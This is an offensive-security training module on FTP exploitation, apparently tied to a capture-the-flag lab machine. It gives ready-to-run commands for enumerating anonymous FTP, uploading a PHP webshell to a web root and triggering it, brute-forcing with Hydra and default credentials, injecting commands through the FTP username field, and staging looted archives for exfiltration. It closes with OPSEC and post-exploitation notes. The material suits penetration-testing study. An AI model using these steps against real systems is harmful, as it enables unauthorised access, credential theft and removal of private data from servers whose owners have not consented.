Back to All Modules

FTP Exploitation

#Overview

FTP (File Transfer Protocol) on port 21 often runs with anonymous authentication enabled or default credentials. Write-enabled FTP directories that overlap with web roots provide a direct path to webshell deployment. FTP servers may also host backup files, database exports, and credential artifacts that enable lateral movement or privilege escalation.

#Prerequisites

  • ftp client (built into most OS) or lftp for recursive operations
  • nmap for version detection and anonymous login check
  • Hydra or medusa for credential brute-forcing

#Detection & Enumeration

Scan for FTP services and check anonymous access:

nmap -p 21 --script ftp-anon,ftp-bounce,ftp-syst <IP>  # Check anonymous FTP and version
ftp <IP> 21                                             # Connect manually
# At prompt: user anonymous, password anything
BASH

Enumerate contents with lftp for recursive listing:

lftp -e "ls -R; quit" ftp://anonymous@<IP>
BASH

#Exploitation / Execution

#Anonymous FTP -- Upload Webshell to Web Root

ftp <IP>
# user: anonymous, pass: anything
ftp> cd /var/www/html                  # Navigate to web root (common: /var/www/html, /htdocs, /inetpub/wwwroot)
ftp> put shell.php                     # Upload PHP/ASPX webshell
ftp> bye
curl http://<IP>/shell.php?cmd=id     # Trigger webshell
BASH

#Anonymous FTP -- Binary File Analysis

Files found on FTP shares (.mdb, .zip, .pst, .bak, .sql) often contain credentials:

ftp <IP>
ftp> get backup.zip                    # Download interesting files
ftp> get database.mdb
ftp> get archive.pst
BASH

Analyze offline:

file backup.zip && unzip backup.zip           # Inspect ZIP contents
mdb-tables database.mdb                       # List MS Access tables
mdb-export database.mdb <table>               # Dump table contents
readpst archive.pst                           # Extract PST email archive
BASH

#Default FTP Credentials

# ProFTPD: admin/admin, proftpd/proftpd
# vsftpd: ftp/ftp, anonymous/anonymous
# FileZilla: default admin config in FileZilla Server.xml
hydra -L users.txt -P passwords.txt ftp://<IP>  # Brute force
BASH

#FTP Command Injection

Some FTP servers are vulnerable to command injection via username or filename parameters. Test by injecting command separators:

ftp <IP>
Name: test; id;
BASH

#File Exfiltration via FTP

If you can write to FTP, use it to stage data:

ftp <IP>
ftp> mkdir exfil
ftp> cd exfil
ftp> put loot.tar.gz       # Upload compromised data back to attacker-controlled FTP
BASH

#Common Pitfalls

  • Warning: Passive vs active FTP mode issues through firewalls -- use passive command or lftp with set ftp:passive-mode on
  • Warning: Binary vs ASCII transfer mode corrupting files -- always use binary mode for executables and archives

#OPSEC Considerations

  • Shield: FTP is cleartext; credentials are visible if traffic is captured
  • Shield: FTP brute-force attempts generate login failure logs (Event ID varies by OS)
  • Shield: Web shell uploads are easily detected by file integrity monitoring if placed in web root

#Post-Exploitation Value

  • Stolen archives and database dumps yield credentials for other services
  • FTP write access combined with webserver enables persistent code execution
  • FTP access to user directories may expose SSH keys (.ssh/), config files, and private documents

#Cross-References

#Tool References

ToolLink
lftphttps://lftp.yar.ru/
hydrahttps://github.com/vanhauser-thc/thc-hydra
readpsthttps://www.five-ten-sg.com/libpst/

#Source Machines

  • Access (Easy, Windows) - FTP anonymous access with stored credentials